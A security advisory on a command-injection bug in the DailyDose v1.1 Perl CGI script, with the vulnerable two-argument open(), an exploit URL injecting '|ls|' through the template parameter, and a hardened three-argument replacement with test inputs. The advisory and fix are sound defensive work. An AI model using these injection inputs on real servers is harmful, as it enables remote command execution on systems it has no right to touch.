
DailyDose v 1.1 CGI:

The bug is in this script:

DailyDose v 1.1 (by www.onlinearts.net)

The script (dose.pl) does not check its input:



$data=$ENV{'QUERY_STRING'};

($command,$list,$temp, $id) = split ("&",$data,4);

. . .

local ($template) = "$tempdir/$temp";

# two-argument open() with $temp unchecked: a "|" in $temp makes Perl treat
# the name as a pipe, and the rest of it is run as a shell command
open(TEMPL, "$template") || print "no file found $template!";



Example (directory listing):

http://www.someserver.com/cgi-bin/dose.pl?daily&somefile.txt&|ls|
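The fix has two parts: validate $temp against a strict file-name pattern before it is used, and call open() in its three-argument form with a fixed "<" mode, so that the name can only ever be a path to read and never a pipe specification. The script below is an added example, not code from DailyDose or its author; $tempdir and the command&list&temp&id query layout are taken from the advisory, and the function names, the pattern and the demo directory are assumptions made here.

```perl
#!/usr/bin/perl
# Added example, not DailyDose code: a hardened replacement for the
# template open() in dose.pl. $tempdir and the query layout
# command&list&temp&id come from the advisory; everything else is assumed.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Accept only a plain file name: a leading letter/digit/underscore, then
# letters, digits, dot, underscore or dash. No "/", no "|", no leading ".",
# so both "|ls|" and "../etc/passwd" are rejected before any open().
sub safe_template_name {
    my ($temp) = @_;
    return undef unless defined $temp;
    return undef unless $temp =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    return $temp;
}

# Three-argument open() with a fixed "<" mode: the name is only ever a
# path to read, never a pipe, whatever characters it holds.
sub read_template {
    my ($tempdir, $temp) = @_;
    my $name = safe_template_name($temp);
    return (undef, "bad template name") unless defined $name;
    my $path = File::Spec->catfile($tempdir, $name);
    open(my $fh, '<', $path) or return (undef, "no file found $path: $!");
    local $/;                     # slurp the whole template
    my $body = <$fh>;
    close($fh);
    return ($body, undef);
}

# Constructed demo: a throwaway template directory and the inputs from the
# advisory plus two variants. Runs only when the file is executed directly.
unless (caller) {
    my $dir = tempdir(CLEANUP => 1);
    open(my $out, '>', "$dir/somefile.txt") or die "cannot write demo file: $!";
    print $out "hello\n";
    close($out);

    # Same split as dose.pl, on a constructed QUERY_STRING for each case.
    for my $query ("daily&somefile.txt&somefile.txt&1",
                   "daily&somefile.txt&|ls|&1",
                   "daily&somefile.txt&../../etc/passwd&1",
                   "daily&somefile.txt&somefile.txt|&1") {
        my ($command, $list, $temp, $id) = split("&", $query, 4);
        my ($body, $err) = read_template($dir, $temp);
        printf "%-22s => %s\n", $temp,
            defined $body ? "opened, " . length($body) . " bytes" : "rejected ($err)";
    }
}
```

Of the four constructed inputs only "somefile.txt" is opened; the other three fail the name check and never reach open(). Note that the validation alone would be enough to stop this particular bug, and the three-argument open() alone would also stop it; using both means a later change to the pattern cannot quietly reintroduce the pipe behaviour.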



-------------------------- 

Alexey Sintsov aka Don_Huan

huan@xp-team.spb.su


